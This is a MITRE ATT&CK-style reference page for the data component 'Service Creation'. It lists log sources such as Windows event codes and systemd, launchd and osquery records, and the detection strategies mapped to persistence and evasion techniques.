Skip to content

DC0060 Service Creation

Item Value
ID DC0060
Version 2.0
Created 20 October 2021
Last Modified 12 November 2025

Log Sources

Name Channel
auditd:CONFIG_CHANGE creation or modification of systemd services
containerLogs:systemd_unit_files unit file referencing container binary with persistent flags
kubernetes:audit create
linux:osquery newly registered unit file with ExecStart pointing to unknown binary
linux:syslog systemctl start/enable with uncommon binary paths
macos:osquery Process Events and Launch Daemons
macos:osquery launch_daemons
macos:osquery detection of new launch agents with suspicious paths or unsigned binaries
macos:unifiedlog creation or loading of new launchd services
macos:unifiedlog launchd loading new LaunchDaemon or changes to existing daemon configuration
Service None
WinEventLog:Security EventCode=4697
WinEventLog:System EventCode=7036
WinEventLog:System EventCode=7045
WinEventLog:System EventCode=7031, 7034

Detection Strategy

ID Name Technique Detected
DET0496 Behavior-Chain Detection for Remote Access Tools (Tool-Agnostic) T1219
DET0021 Behavioral Detection for Service Stop across Platforms T1489
DET0089 Behavioral Detection of Keylogging Activity Across Platforms T1056.001
DET0127 Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy T1036
DET0098 Detect abuse of Windows BITS Jobs for download, execution and persistence T1197
DET0462 Detect LLMNR/NBT-NS Poisoning and SMB Relay on Windows T1557.001
DET0473 Detect persistent or elevated container services via container runtime or cluster manipulation T1543.005
DET0588 Detection fo Remote Service Session Hijacking for RDP. T1563.002
DET0311 Detection for Spoofing Security Alerting across OS Platforms T1562.011
DET0764 Detection of Adversary-in-the-Middle T0830
DET0497 Detection of Impair Defenses through Disabled or Modified Tools across OS Platforms. T1562.001
DET0377 Detection of Kernel/User-Level Rootkit Behavior Across Platforms T1014
DET0434 Detection of Launch Agent Creation or Modification on macOS T1543.001
DET0117 Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution T1036.004
DET0725 Detection of Masquerading T0849
DET0571 Detection of System Process Creation or Modification Across Platforms T1543
DET0253 Detection of Systemd Service Creation or Modification on Linux T1543.002
DET0552 Detection of Windows Service Creation or Modification T1543.003
DET0304 Detection Strategy for Endpoint DoS via Application or System Exploitation T1499.004
DET0321 Detection Strategy for Hidden Virtual Instance Execution T1564.006
DET0436 Detection Strategy for Hijack Execution Flow through Services File Permissions Weakness. T1574.010
DET0317 Detection Strategy for Impair Defenses Across Platforms T1562
DET0401 Detection Strategy for Launch Daemon Creation or Modification (macOS) T1543.004
DET0314 Detection Strategy for Network Sniffing Across Platforms T1040
DET0279 Detection Strategy for System Services across OS platforms. T1569
DET0421 Detection Strategy for System Services Service Execution T1569.002
DET0265 Detection Strategy for System Services: Launchctl T1569.001
DET0073 Detection Strategy for System Services: Systemctl T1569.003
DET0075 Internal Proxy Behavior via Lateral Host-to-Host C2 Relay T1090.001
DET0162 Socket-filter trigger → on-host raw-socket activity → reverse connection (T1205.002) T1205.002